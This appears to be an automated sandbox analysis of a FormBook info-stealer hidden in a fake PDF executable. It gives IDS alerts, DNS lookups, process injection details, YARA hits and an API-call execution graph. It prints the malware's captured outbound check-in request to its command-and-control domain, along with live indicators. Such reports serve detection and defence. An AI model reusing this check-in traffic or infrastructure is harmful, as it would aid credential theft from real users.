                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-12-05T15:21:49.570313+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.11.20 | 49739 | 172.67.134.42 | 80 | TCP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 5, 2024 15:21:49.064372063 CET | 49739 | 80 | 192.168.11.20 | 172.67.134.42
                                    Dec 5, 2024 15:21:49.188771963 CET | 80 | 49739 | 172.67.134.42 | 192.168.11.20
                                    Dec 5, 2024 15:21:49.189018011 CET | 49739 | 80 | 192.168.11.20 | 172.67.134.42
                                    Dec 5, 2024 15:21:49.191601992 CET | 49739 | 80 | 192.168.11.20 | 172.67.134.42
                                    Dec 5, 2024 15:21:49.316037893 CET | 80 | 49739 | 172.67.134.42 | 192.168.11.20
                                    Dec 5, 2024 15:21:49.569597006 CET | 80 | 49739 | 172.67.134.42 | 192.168.11.20
                                    Dec 5, 2024 15:21:49.569647074 CET | 80 | 49739 | 172.67.134.42 | 192.168.11.20
                                    Dec 5, 2024 15:21:49.569684029 CET | 80 | 49739 | 172.67.134.42 | 192.168.11.20
                                    Dec 5, 2024 15:21:49.570312977 CET | 49739 | 80 | 192.168.11.20 | 172.67.134.42
                                    Dec 5, 2024 15:21:49.570312977 CET | 49739 | 80 | 192.168.11.20 | 172.67.134.42
                                    Dec 5, 2024 15:21:49.571197033 CET | 49739 | 80 | 192.168.11.20 | 172.67.134.42
                                    Dec 5, 2024 15:21:49.695343018 CET | 80 | 49739 | 172.67.134.42 | 192.168.11.20
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 5, 2024 15:21:48.897442102 CET | 53761 | 53 | 192.168.11.20 | 1.1.1.1
                                    Dec 5, 2024 15:21:49.060867071 CET | 53 | 53761 | 1.1.1.1 | 192.168.11.20
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Dec 5, 2024 15:21:48.897442102 CET | 192.168.11.20 | 1.1.1.1 | 0x1bac | Standard query (0) | www.topkapiescortg.xyz | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Dec 5, 2024 15:21:49.060867071 CET | 1.1.1.1 | 192.168.11.20 | 0x1bac | No error (0) | www.topkapiescortg.xyz | | 172.67.134.42 | A (IP address) | IN (0x0001) | false
                                    Dec 5, 2024 15:21:49.060867071 CET | 1.1.1.1 | 192.168.11.20 | 0x1bac | No error (0) | www.topkapiescortg.xyz | | 104.21.6.17 | A (IP address) | IN (0x0001) | false
                                    • www.topkapiescortg.xyz
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.11.20 | 49739 | 172.67.134.42 | 80 | 7548 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Dec 5, 2024 15:21:49.191601992 CET | 480 | OUT | GET /cz1i/?XV=QNGNUsgi9ans25&VT3s=lCWtxBlDPSCNJhRz7147v4YzJ6rIzSVGmK+Kme085vCDtUrqSJqQP+YtwYINSw3lRTDSNZCzyCPLZyeariLf2RdsyM6VIL0C/A8nWtsFZVjXlXjChXabsak= HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                    Accept-Language: en-US,en;q=0.9
                                    Host: www.topkapiescortg.xyz
                                    Connection: close
                                    User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
                                    Dec 5, 2024 15:21:49.569597006 CET | 1130 | IN | HTTP/1.1 404 Not Found
                                    Date: Thu, 05 Dec 2024 14:21:49 GMT
                                    Content-Type: text/html; charset=iso-8859-1
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZH5wQpO6H194y%2BaZLyRpkLRI4RSMTwlhkgwSjKBdBM9q02tes%2FcoywC%2BSCIf%2FirNo%2FJkMTOUthCWHLX6lHxA73c4cH44sRjzMAa5b4iBJOWbQr1JtAlFNzad8h%2FEO%2FHT6EXLeqbxkXO"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 8ed4af4eda1d3346-MIA
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=124553&min_rtt=124553&rtt_var=62276&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=480&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                    Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                    Dec 5, 2024 15:21:49.569647074 CET5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Target ID:0
                                    Start time:09:20:50
                                    Start date:05/12/2024
                                    Path:C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
                                    Imagebase:0x340000
                                    File size:1'187'840 bytes
                                    MD5 hash:0F4C38F8DEF111C7FDB237B985C66CA0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:09:20:51
                                    Start date:05/12/2024
                                    Path:C:\Windows\SysWOW64\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"
                                    Imagebase:0x10000
                                    File size:47'016 bytes
                                    MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:21:29
                                    Start date:05/12/2024
                                    Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                    Imagebase:0x140000000
                                    File size:16'696'840 bytes
                                    MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:3
                                    Start time:09:21:29
                                    Start date:05/12/2024
                                    Path:C:\Windows\SysWOW64\newdev.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\SysWOW64\newdev.exe"
                                    Imagebase:0xd00000
                                    File size:67'584 bytes
                                    MD5 hash:775D479963E7ED5969665E44D8859438
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:09:21:54
                                    Start date:05/12/2024
                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                    Wow64 process (32bit):
                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                    Imagebase:
                                    File size:597'432 bytes
                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false


                                      Execution Graph

                                      Execution Coverage:4.2%
                                      Dynamic/Decrypted Code Coverage:1.3%
                                      Signature Coverage:6.2%
                                      Total number of Nodes:2000
                                      Total number of Limit Nodes:163
                                      execution_graph
93788 361c9d 47 API calls 93784->93788 94143 38b965 93785->94143 93789 38c4e2 93786->93789 93792 38c41b 93788->93792 93791 361c9d 47 API calls 93789->93791 93791->93792 93792->93683 93794 344252 93792->93794 93793 361c9d 47 API calls 93793->93792 93795 344263 93794->93795 93796 34425c 93794->93796 93798 344272 93795->93798 93799 344283 FreeLibrary 93795->93799 93797 3635e4 83 API calls 93796->93797 93797->93795 93798->93683 93799->93798 93849 344339 93800->93849 93804 344244 FreeLibrary 93805 3441bb 93804->93805 93807 363499 93805->93807 93806 34423c 93806->93804 93806->93805 93857 3634ae 93807->93857 93809 3441c8 93809->93740 93809->93741 93936 3442e4 93810->93936 93813 3442b8 93815 3442c1 FreeLibrary 93813->93815 93816 3441ec 93813->93816 93815->93816 93817 344380 93816->93817 93818 35f4ea 48 API calls 93817->93818 93819 344395 93818->93819 93820 3447b7 48 API calls 93819->93820 93821 3443a1 93820->93821 93822 3443dc 93821->93822 93823 3444d1 93821->93823 93824 344499 93821->93824 93825 344950 57 API calls 93822->93825 93955 38c750 93 API calls 93823->93955 93944 34406b CreateStreamOnHGlobal 93824->93944 93829 3443e5 93825->93829 93828 3444ed 64 API calls 93828->93829 93829->93828 93830 344479 93829->93830 93832 3b4ed7 93829->93832 93950 344517 93829->93950 93830->93748 93833 344517 83 API calls 93832->93833 93834 3b4eeb 93833->93834 93835 3444ed 64 API calls 93834->93835 93835->93830 93837 3444ff 93836->93837 93840 3b4fc0 93836->93840 93979 36381e 93837->93979 93841 38bf5a 94114 38bdb4 93841->94114 93843 38bf70 93843->93756 93845 3b5002 93844->93845 93846 34495f 93844->93846 94119 363e65 93846->94119 93848 344967 93848->93758 93853 34434b 93849->93853 93852 344321 LoadLibraryA GetProcAddress 93852->93806 93854 34422f 93853->93854 93855 344354 LoadLibraryA 93853->93855 93854->93806 93854->93852 93855->93854 93856 344365 GetProcAddress 93855->93856 93856->93854 93860 3634ba 93857->93860 93858 3634cd 93905 367c0e 47 API calls 93858->93905 93860->93858 93862 3634fe 
93860->93862 93861 3634d2 93906 366e10 8 API calls 93861->93906 93876 36e4c8 93862->93876 93865 363503 93866 36350c 93865->93866 93867 363519 93865->93867 93907 367c0e 47 API calls 93866->93907 93869 363543 93867->93869 93870 363523 93867->93870 93890 36e5e0 93869->93890 93908 367c0e 47 API calls 93870->93908 93875 3634dd 93875->93809 93877 36e4d4 93876->93877 93878 367cf4 47 API calls 93877->93878 93879 36e4e2 93878->93879 93880 36e559 93879->93880 93885 367d7c 47 API calls 93879->93885 93888 36e552 93879->93888 93913 364e5b 48 API calls 93879->93913 93914 364ec5 LeaveCriticalSection LeaveCriticalSection 93879->93914 93915 3669d0 47 API calls 93880->93915 93883 36e560 93884 36e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93883->93884 93883->93888 93884->93888 93885->93879 93887 36e5cc 93887->93865 93910 36e5d7 93888->93910 93891 36e600 93890->93891 93892 36e61a 93891->93892 93904 36e7d5 93891->93904 93922 36185b 59 API calls 93891->93922 93920 367c0e 47 API calls 93892->93920 93894 36e61f 93921 366e10 8 API calls 93894->93921 93896 36e838 93917 3763c9 93896->93917 93898 36354e 93909 363570 LeaveCriticalSection LeaveCriticalSection 93898->93909 93900 36e7ce 93900->93904 93923 36185b 59 API calls 93900->93923 93902 36e7ed 93902->93904 93924 36185b 59 API calls 93902->93924 93904->93892 93904->93896 93905->93861 93906->93875 93907->93875 93908->93875 93909->93875 93916 367e58 LeaveCriticalSection 93910->93916 93912 36e5de 93912->93887 93913->93879 93914->93879 93915->93883 93916->93912 93925 375bb1 93917->93925 93919 3763e2 93919->93898 93920->93894 93921->93898 93922->93900 93923->93902 93924->93904 93928 375bbd 93925->93928 93926 375bcf 93927 367c0e 47 API calls 93926->93927 93929 375bd4 93927->93929 93928->93926 93930 375c06 93928->93930 93931 366e10 8 API calls 93929->93931 93932 375c78 110 API calls 93930->93932 93935 375bde 93931->93935 93933 375c23 93932->93933 93934 375c4c LeaveCriticalSection 93933->93934 93934->93935 93935->93919 93940 
3442f6 93936->93940 93939 3442cc LoadLibraryA GetProcAddress 93939->93813 93941 3442aa 93940->93941 93942 3442ff LoadLibraryA 93940->93942 93941->93813 93941->93939 93942->93941 93943 344310 GetProcAddress 93942->93943 93943->93941 93945 344085 FindResourceExW 93944->93945 93946 3440a2 93944->93946 93945->93946 93947 3b4f16 LoadResource 93945->93947 93946->93822 93947->93946 93948 3b4f2b SizeofResource 93947->93948 93948->93946 93949 3b4f3f LockResource 93948->93949 93949->93946 93951 344526 93950->93951 93952 3b4fe0 93950->93952 93956 363a8d 93951->93956 93954 344534 93954->93829 93955->93822 93959 363a99 93956->93959 93957 363aa7 93969 367c0e 47 API calls 93957->93969 93959->93957 93960 363acd 93959->93960 93971 364e1c 93960->93971 93962 363aac 93970 366e10 8 API calls 93962->93970 93963 363ad3 93977 3639fe 81 API calls 93963->93977 93966 363ae2 93978 363b04 LeaveCriticalSection LeaveCriticalSection 93966->93978 93968 363ab7 93968->93954 93969->93962 93970->93968 93972 364e4e EnterCriticalSection 93971->93972 93973 364e2c 93971->93973 93975 364e44 93972->93975 93973->93972 93974 364e34 93973->93974 93976 367cf4 47 API calls 93974->93976 93975->93963 93976->93975 93977->93966 93978->93968 93982 363839 93979->93982 93981 344510 93981->93841 93983 363845 93982->93983 93984 36385b 93983->93984 93985 363888 93983->93985 93986 363880 93983->93986 94009 367c0e 47 API calls 93984->94009 93987 364e1c 48 API calls 93985->93987 93986->93981 93989 36388e 93987->93989 93995 36365b 93989->93995 93990 363875 94010 366e10 8 API calls 93990->94010 93999 363676 93995->93999 94002 363691 93995->94002 93996 363681 94110 367c0e 47 API calls 93996->94110 93998 363686 94111 366e10 8 API calls 93998->94111 93999->93996 93999->94002 94006 3636cf 93999->94006 94011 3638c2 LeaveCriticalSection LeaveCriticalSection 94002->94011 94003 3637e0 94113 367c0e 47 API calls 94003->94113 94006->94002 94006->94003 94012 362933 94006->94012 94019 36ee0e 94006->94019 94090 36eb66 94006->94090 94112 
36ec87 47 API calls 94006->94112 94009->93990 94010->93986 94011->93986 94013 362952 94012->94013 94014 36293d 94012->94014 94013->94006 94015 367c0e 47 API calls 94014->94015 94016 362942 94015->94016 94017 366e10 8 API calls 94016->94017 94018 36294d 94017->94018 94018->94006 94020 36ee46 94019->94020 94021 36ee2f 94019->94021 94023 36f57e 94020->94023 94027 36ee80 94020->94027 94022 367bda 47 API calls 94021->94022 94024 36ee34 94022->94024 94025 367bda 47 API calls 94023->94025 94026 367c0e 47 API calls 94024->94026 94028 36f583 94025->94028 94070 36ee3b 94026->94070 94029 36ee88 94027->94029 94037 36ee9f 94027->94037 94030 367c0e 47 API calls 94028->94030 94031 367bda 47 API calls 94029->94031 94033 36ee94 94030->94033 94032 36ee8d 94031->94032 94039 367c0e 47 API calls 94032->94039 94034 366e10 8 API calls 94033->94034 94034->94070 94035 36eeb4 94036 367bda 47 API calls 94035->94036 94036->94032 94037->94035 94038 36eece 94037->94038 94040 36eeec 94037->94040 94037->94070 94038->94035 94044 36eed9 94038->94044 94039->94033 94042 3669d0 47 API calls 94040->94042 94045 36eefc 94042->94045 94043 373bf2 47 API calls 94046 36efed 94043->94046 94044->94043 94047 36ef04 94045->94047 94048 36ef1f 94045->94048 94050 36f066 ReadFile 94046->94050 94055 36f003 GetConsoleMode 94046->94055 94049 367c0e 47 API calls 94047->94049 94051 36f82f 49 API calls 94048->94051 94052 36ef09 94049->94052 94053 36f546 GetLastError 94050->94053 94054 36f088 94050->94054 94056 36ef2d 94051->94056 94057 367bda 47 API calls 94052->94057 94058 36f553 94053->94058 94059 36f046 94053->94059 94054->94053 94064 36f058 94054->94064 94060 36f017 94055->94060 94061 36f063 94055->94061 94056->94044 94062 36ef14 94057->94062 94063 367c0e 47 API calls 94058->94063 94068 367bed 47 API calls 94059->94068 94072 36f04c 94059->94072 94060->94061 94065 36f01d ReadConsoleW 94060->94065 94061->94050 94062->94070 94066 36f558 94063->94066 94064->94072 94073 36f0bd 94064->94073 94080 36f32a 94064->94080 
94065->94064 94067 36f040 GetLastError 94065->94067 94069 367bda 47 API calls 94066->94069 94067->94059 94068->94072 94069->94072 94070->94006 94071 361c9d 47 API calls 94071->94070 94072->94070 94072->94071 94075 36f129 ReadFile 94073->94075 94081 36f1aa 94073->94081 94076 36f14a GetLastError 94075->94076 94089 36f154 94075->94089 94076->94089 94077 36f267 94084 36f217 MultiByteToWideChar 94077->94084 94085 36f82f 49 API calls 94077->94085 94078 36f257 94082 367c0e 47 API calls 94078->94082 94079 36f430 ReadFile 94083 36f453 GetLastError 94079->94083 94087 36f461 94079->94087 94080->94072 94080->94079 94081->94072 94081->94077 94081->94078 94081->94084 94082->94072 94083->94087 94084->94067 94084->94072 94085->94084 94086 36f82f 49 API calls 94086->94089 94087->94080 94088 36f82f 49 API calls 94087->94088 94088->94087 94089->94073 94089->94086 94091 36eb71 94090->94091 94095 36eb86 94090->94095 94092 367c0e 47 API calls 94091->94092 94093 36eb76 94092->94093 94094 366e10 8 API calls 94093->94094 94104 36eb81 94094->94104 94096 36ebbb 94095->94096 94097 373e24 47 API calls 94095->94097 94095->94104 94098 362933 47 API calls 94096->94098 94097->94096 94099 36ebcf 94098->94099 94100 36ed06 62 API calls 94099->94100 94101 36ebd6 94100->94101 94102 362933 47 API calls 94101->94102 94101->94104 94103 36ebf9 94102->94103 94103->94104 94105 362933 47 API calls 94103->94105 94104->94006 94106 36ec05 94105->94106 94106->94104 94107 362933 47 API calls 94106->94107 94108 36ec12 94107->94108 94109 362933 47 API calls 94108->94109 94109->94104 94110->93998 94111->94002 94112->94006 94113->93998 94117 36344a GetSystemTimeAsFileTime 94114->94117 94116 38bdc3 94116->93843 94118 363478 94117->94118 94118->94116 94120 363e71 94119->94120 94121 363e94 94120->94121 94122 363e7f 94120->94122 94124 364e1c 48 API calls 94121->94124 94133 367c0e 47 API calls 94122->94133 94126 363e9a 94124->94126 94125 363e84 94134 366e10 8 API calls 94125->94134 94135 363b0c 55 API calls 94126->94135 
94129 363ea5 94136 363ec5 LeaveCriticalSection LeaveCriticalSection 94129->94136 94130 363e8f 94130->93848 94132 363eb7 94132->94130 94133->94125 94134->94130 94135->94129 94136->94132 94138 38c581 94137->94138 94139 38c417 94138->94139 94140 3444ed 64 API calls 94138->94140 94141 38bf5a GetSystemTimeAsFileTime 94138->94141 94142 344517 83 API calls 94138->94142 94139->93764 94139->93792 94140->94138 94141->94138 94142->94138 94144 38b97e 94143->94144 94145 38b970 94143->94145 94147 38b9c3 94144->94147 94148 363499 117 API calls 94144->94148 94158 38b987 94144->94158 94146 363499 117 API calls 94145->94146 94146->94144 94174 38bbe8 94147->94174 94149 38b9a8 94148->94149 94149->94147 94151 38b9b1 94149->94151 94155 3635e4 83 API calls 94151->94155 94151->94158 94152 38ba07 94153 38ba0b 94152->94153 94154 38ba2c 94152->94154 94157 38ba18 94153->94157 94160 3635e4 83 API calls 94153->94160 94178 38b7e5 94154->94178 94155->94158 94157->94158 94161 3635e4 83 API calls 94157->94161 94158->93793 94160->94157 94161->94158 94162 38ba5a 94187 38ba8a 94162->94187 94163 38ba3a 94166 3635e4 83 API calls 94163->94166 94167 38ba47 94163->94167 94166->94167 94167->94158 94169 3635e4 83 API calls 94167->94169 94169->94158 94171 38ba75 94171->94158 94173 3635e4 83 API calls 94171->94173 94173->94158 94175 38bc0d 94174->94175 94177 38bbf6 94174->94177 94176 36381e 64 API calls 94175->94176 94176->94177 94177->94152 94179 36395c 47 API calls 94178->94179 94180 38b7f4 94179->94180 94181 36395c 47 API calls 94180->94181 94182 38b808 94181->94182 94183 36395c 47 API calls 94182->94183 94184 38b81c 94183->94184 94185 38bb64 47 API calls 94184->94185 94186 38b82f 94184->94186 94185->94186 94186->94162 94186->94163 94188 38baa0 94187->94188 94189 38bb51 94188->94189 94191 38ba61 94188->94191 94193 38b841 64 API calls 94188->94193 94220 38b942 64 API calls 94188->94220 94221 38bc67 80 API calls 94188->94221 94216 38bd8a 94189->94216 94195 38bb64 94191->94195 94193->94188 94196 38bb77 
94195->94196 94197 38bb71 94195->94197 94199 361c9d 47 API calls 94196->94199 94200 38bb88 94196->94200 94198 361c9d 47 API calls 94197->94198 94198->94196 94199->94200 94201 361c9d 47 API calls 94200->94201 94202 38ba68 94200->94202 94201->94202 94202->94171 94203 3635e4 94202->94203 94204 3635f0 94203->94204 94205 363604 94204->94205 94206 36361c 94204->94206 94266 367c0e 47 API calls 94205->94266 94208 364e1c 48 API calls 94206->94208 94213 363614 94206->94213 94210 36362e 94208->94210 94209 363609 94267 366e10 8 API calls 94209->94267 94250 363578 94210->94250 94213->94171 94217 38bda8 94216->94217 94218 38bd97 94216->94218 94217->94191 94222 362aae 94218->94222 94220->94188 94221->94188 94223 362aba 94222->94223 94224 362ad4 94223->94224 94225 362aec 94223->94225 94226 362ae4 94223->94226 94247 367c0e 47 API calls 94224->94247 94227 364e1c 48 API calls 94225->94227 94226->94217 94229 362af2 94227->94229 94235 362957 94229->94235 94230 362ad9 94248 366e10 8 API calls 94230->94248 94237 362966 94235->94237 94244 362984 94235->94244 94236 362974 94238 367c0e 47 API calls 94236->94238 94237->94236 94239 36299c 94237->94239 94237->94244 94240 362979 94238->94240 94242 368e63 78 API calls 94239->94242 94243 362c84 78 API calls 94239->94243 94239->94244 94245 362933 47 API calls 94239->94245 94246 36af61 78 API calls 94239->94246 94241 366e10 8 API calls 94240->94241 94241->94244 94242->94239 94243->94239 94249 362b24 LeaveCriticalSection LeaveCriticalSection 94244->94249 94245->94239 94246->94239 94247->94230 94248->94226 94249->94226 94251 363587 94250->94251 94252 36359b 94250->94252 94302 367c0e 47 API calls 94251->94302 94254 363597 94252->94254 94269 362c84 94252->94269 94268 363653 LeaveCriticalSection LeaveCriticalSection 94254->94268 94256 36358c 94303 366e10 8 API calls 94256->94303 94261 362933 47 API calls 94262 3635b5 94261->94262 94279 36e9d2 94262->94279 94264 3635bb 94264->94254 94265 361c9d 47 API calls 94264->94265 94265->94254 94266->94209 
94267->94213 94268->94213 94270 362c97 94269->94270 94271 362cbb 94269->94271 94270->94271 94272 362933 47 API calls 94270->94272 94275 36eb36 94271->94275 94273 362cb4 94272->94273 94304 36af61 94273->94304 94276 3635af 94275->94276 94277 36eb43 94275->94277 94276->94261 94277->94276 94278 361c9d 47 API calls 94277->94278 94278->94276 94280 36e9de 94279->94280 94281 36e9e6 94280->94281 94286 36e9fe 94280->94286 94353 367bda 47 API calls 94281->94353 94283 36ea7b 94357 367bda 47 API calls 94283->94357 94284 36e9eb 94354 367c0e 47 API calls 94284->94354 94286->94283 94289 36ea28 94286->94289 94288 36ea80 94358 367c0e 47 API calls 94288->94358 94329 36a8ed 94289->94329 94292 36ea88 94359 366e10 8 API calls 94292->94359 94293 36ea2e 94295 36ea41 94293->94295 94296 36ea4c 94293->94296 94338 36ea9c 94295->94338 94355 367c0e 47 API calls 94296->94355 94298 36e9f3 94298->94264 94300 36ea47 94356 36ea73 LeaveCriticalSection 94300->94356 94302->94256 94303->94254 94305 36af6d 94304->94305 94306 36af75 94305->94306 94307 36af8d 94305->94307 94308 367bda 47 API calls 94306->94308 94309 36b022 94307->94309 94313 36afbf 94307->94313 94310 36af7a 94308->94310 94311 367bda 47 API calls 94309->94311 94312 367c0e 47 API calls 94310->94312 94314 36b027 94311->94314 94325 36af82 94312->94325 94315 36a8ed 49 API calls 94313->94315 94316 367c0e 47 API calls 94314->94316 94317 36afc5 94315->94317 94318 36b02f 94316->94318 94319 36afeb 94317->94319 94320 36afd8 94317->94320 94321 366e10 8 API calls 94318->94321 94323 367c0e 47 API calls 94319->94323 94322 36b043 75 API calls 94320->94322 94321->94325 94324 36afe4 94322->94324 94326 36aff0 94323->94326 94328 36b01a LeaveCriticalSection 94324->94328 94325->94271 94327 367bda 47 API calls 94326->94327 94327->94324 94328->94325 94330 36a8f9 94329->94330 94331 36a946 EnterCriticalSection 94330->94331 94333 367cf4 47 API calls 94330->94333 94332 36a96c 94331->94332 94332->94293 94334 36a91d 94333->94334 94335 36a93a 94334->94335 94336 36a928 
InitializeCriticalSectionAndSpinCount 94334->94336 94337 36a970 LeaveCriticalSection 94335->94337 94336->94335 94337->94331 94339 36aba4 47 API calls 94338->94339 94342 36eaaa 94339->94342 94340 36eb00 94341 36ab1e 48 API calls 94340->94341 94346 36eb08 94341->94346 94342->94340 94343 36eade 94342->94343 94344 36aba4 47 API calls 94342->94344 94343->94340 94345 36aba4 47 API calls 94343->94345 94347 36ead5 94344->94347 94348 36eaea CloseHandle 94345->94348 94349 36eb2a 94346->94349 94352 367bed 47 API calls 94346->94352 94350 36aba4 47 API calls 94347->94350 94348->94340 94351 36eaf6 GetLastError 94348->94351 94349->94300 94350->94343 94351->94340 94352->94349 94353->94284 94354->94298 94355->94300 94356->94298 94357->94288 94358->94292 94359->94298 94360->93697 94361->93697 94362->93698 94363->93711 94364->93713 94365->93710 94366->93727 94367->93723 94369 36f8a0 94368->94369 94370 3440b4 GetLongPathNameW 94369->94370 94371 346a63 48 API calls 94370->94371 94372 3440dc 94371->94372 94373 3449a0 94372->94373 94374 34d7f7 48 API calls 94373->94374 94375 3449b2 94374->94375 94376 34660f 49 API calls 94375->94376 94377 3449bd 94376->94377 94378 3449c8 94377->94378 94379 3b2e35 94377->94379 94381 3464cf 48 API calls 94378->94381 94383 3b2e4f 94379->94383 94426 35d35e 60 API calls 94379->94426 94382 3449d4 94381->94382 94420 3428a6 94382->94420 94385 3449e7 94385->93556 94387 3441a9 136 API calls 94386->94387 94388 34415e 94387->94388 94389 3b3489 94388->94389 94390 3441a9 136 API calls 94388->94390 94391 38c396 122 API calls 94389->94391 94392 344172 94390->94392 94393 3b349e 94391->94393 94392->94389 94394 34417a 94392->94394 94395 3b34bf 94393->94395 94396 3b34a2 94393->94396 94398 3b34aa 94394->94398 94399 344186 94394->94399 94397 35f4ea 48 API calls 94395->94397 94400 344252 84 API calls 94396->94400 94419 3b3504 94397->94419 94529 386b49 87 API calls 94398->94529 94427 34c833 94399->94427 94400->94398 94404 3b34b8 94404->94395 94405 3b36b4 94406 361c9d 47 API 
calls 94405->94406 94407 3b36bc 94406->94407 94408 344252 84 API calls 94407->94408 94409 3b36c5 94408->94409 94413 361c9d 47 API calls 94409->94413 94414 344252 84 API calls 94409->94414 94533 3825b5 86 API calls 94409->94533 94413->94409 94414->94409 94416 34ce19 48 API calls 94416->94419 94419->94405 94419->94409 94419->94416 94515 34ba85 94419->94515 94523 344dd9 94419->94523 94530 382551 48 API calls 94419->94530 94531 382472 60 API calls 94419->94531 94532 389c12 48 API calls 94419->94532 94421 3428b8 94420->94421 94425 3428d7 94420->94425 94423 35f4ea 48 API calls 94421->94423 94422 35f4ea 48 API calls 94424 3428ee 94422->94424 94423->94425 94424->94385 94425->94422 94426->94379 94428 34c843 94427->94428 94429 34c860 94428->94429 94430 3b3095 94428->94430 94539 3448ba 49 API calls 94429->94539 94558 3825b5 86 API calls 94430->94558 94433 34c882 94540 344550 56 API calls 94433->94540 94434 3b30a8 94559 3825b5 86 API calls 94434->94559 94436 34c897 94436->94434 94438 34c89f 94436->94438 94440 34d7f7 48 API calls 94438->94440 94439 3b30c4 94442 34c90c 94439->94442 